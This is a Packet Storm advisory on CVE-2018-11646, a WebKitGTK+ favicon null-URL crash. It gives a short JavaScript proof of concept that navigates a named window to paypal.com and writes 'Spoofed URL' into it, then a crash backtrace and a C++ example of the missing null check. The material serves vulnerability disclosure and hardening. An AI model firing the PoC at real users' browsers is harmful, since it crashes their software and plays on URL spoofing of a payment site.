
WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service

Date: 05 Jun 2018. Reported by: Mishra Dhiraj. Type: packetstorm (packetstormsecurity.com)

WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service, CVE-2018-11646

Summary:
  
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL: the null page URL is passed on to the favicon hash map, where hashing it dereferences a null string, leading to an application crash. CVE-2018-11646 was assigned to this issue.
  
PoC Author: @magicmac2000  
Found Issue in Webkit: Dhiraj Mishra (Team w00t)  
  
PoC:

```html
<script>
  // Open a window on a slow-loading page, so it has not yet settled on a URL.
  win = window.open("sleep_one_second.php", "WIN");
  // Navigate the same named window to a second site.
  window.open("https://www.paypal.com", "WIN");
  // Stop the pending load and write content into the still-unsettled window.
  win.document.execCommand('Stop');
  win.document.write("Spoofed URL");
  win.document.close();
</script>
```
  
  
Backtrace (Fedora 27, webkitgtk4-2.18.0-2.fc27, Epiphany as the host application; intermediate frames omitted, and template arguments in some frame names were lost in extraction):
  
```text
#0  WTF::StringImpl::rawHash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1  WTF::StringImpl::hasHash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2  WTF::StringImpl::hash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3  WTF::StringHash::hash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9  WTF::HashMap, WTF::HashTraits >::get at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator() at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer) at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch at gmain.c line 3148
#31 g_main_context_dispatch at gmain.c line 3813
#32 g_main_context_iterate at gmain.c line 3886
#33 g_main_context_iteration at gmain.c line 3947
#34 g_application_run at gapplication.c line 2401
#35 main at ../src/ephy-main.c line 432
```
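The backtrace shows the shape of the defect: a page URL that was never set reaches a string-keyed hash map, and hashing the key reads storage that does not exist. The following is an added illustration written for this page, not WebKit's code and not the upstream fix. `MaybeString`, `FaviconDatabase`, and the `setIconURLForPageURL*` functions are invented stand-ins for a nullable WTF::String, the favicon page-URL map, and the setter in WebKitFaviconDatabase.cpp; `std::abort()` stands in for the null dereference so the crash path is deterministic. It places the unchecked pattern beside the guarded one: the guarded setter simply declines to record a favicon for a page that has no URL yet, so the UI process stays up.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <memory>
#include <string>
#include <unordered_map>
#include <utility>

// Hypothetical stand-in for a WTF::String whose StringImpl pointer may be
// null ("unset"). Type and function names in this file are invented.
struct MaybeString {
    std::shared_ptr<const std::string> impl;  // nullptr => unset string

    MaybeString() = default;
    explicit MaybeString(std::string s)
        : impl(std::make_shared<const std::string>(std::move(s))) {}

    bool isNull() const { return impl == nullptr; }

    // Plays the role of StringImpl::rawHash() in the backtrace. The real code
    // reads the backing storage unconditionally; abort() models that crash.
    uint32_t rawHash() const {
        if (!impl) std::abort();
        uint32_t h = 2166136261u;  // FNV-1a, illustration only
        for (unsigned char c : *impl) { h ^= c; h *= 16777619u; }
        return h;
    }
};

struct MaybeStringHash {
    size_t operator()(const MaybeString& s) const { return s.rawHash(); }
};
struct MaybeStringEq {
    // Only reached after hashing, so both keys are known to be non-null here.
    bool operator()(const MaybeString& a, const MaybeString& b) const {
        return *a.impl == *b.impl;
    }
};

// Toy favicon database: page URL -> icon URL (constructed for this example).
using FaviconDatabase =
    std::unordered_map<MaybeString, std::string, MaybeStringHash, MaybeStringEq>;

// Mishandling pattern: the page URL goes straight into the map, so an unset
// URL reaches rawHash() and the whole process goes down.
void setIconURLForPageURLUnchecked(FaviconDatabase& db,
                                   const MaybeString& pageURL,
                                   const MaybeString& iconURL) {
    db[pageURL] = *iconURL.impl;
}

// Hardened pattern: reject unset URLs before anything hashes them. A page
// that has no URL yet gets no favicon entry and nothing crashes.
bool setIconURLForPageURLChecked(FaviconDatabase& db,
                                 const MaybeString& pageURL,
                                 const MaybeString& iconURL) {
    if (pageURL.isNull() || iconURL.isNull())
        return false;
    db[pageURL] = *iconURL.impl;
    return true;
}

// Lookup with the same guard; empty string means "no entry".
std::string iconURLForPageURL(const FaviconDatabase& db,
                              const MaybeString& pageURL) {
    if (pageURL.isNull()) return std::string();
    auto it = db.find(pageURL);
    return it == db.end() ? std::string() : it->second;
}

int main() {
    FaviconDatabase db;
    // Constructed inputs: a settled page and a window with no URL yet.
    MaybeString settled("https://example.test/");
    MaybeString unset;
    MaybeString icon("https://example.test/favicon.ico");
    std::printf("settled page recorded: %s\n",
                setIconURLForPageURLChecked(db, settled, icon) ? "yes" : "no");
    std::printf("unset page recorded:   %s\n",
                setIconURLForPageURLChecked(db, unset, icon) ? "yes" : "no");
    std::printf("entries: %zu\n", db.size());
    // setIconURLForPageURLUnchecked(db, unset, icon) would abort here.
    return 0;
}
```

The guard belongs at the boundary where the URL enters the favicon code, before any hashing or database work, because every later frame in the trace assumes a valid key.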
  
  
References:

https://bugs.webkit.org/show_bug.cgi?id=186164
https://bugzilla.gnome.org/show_bug.cgi?id=795740
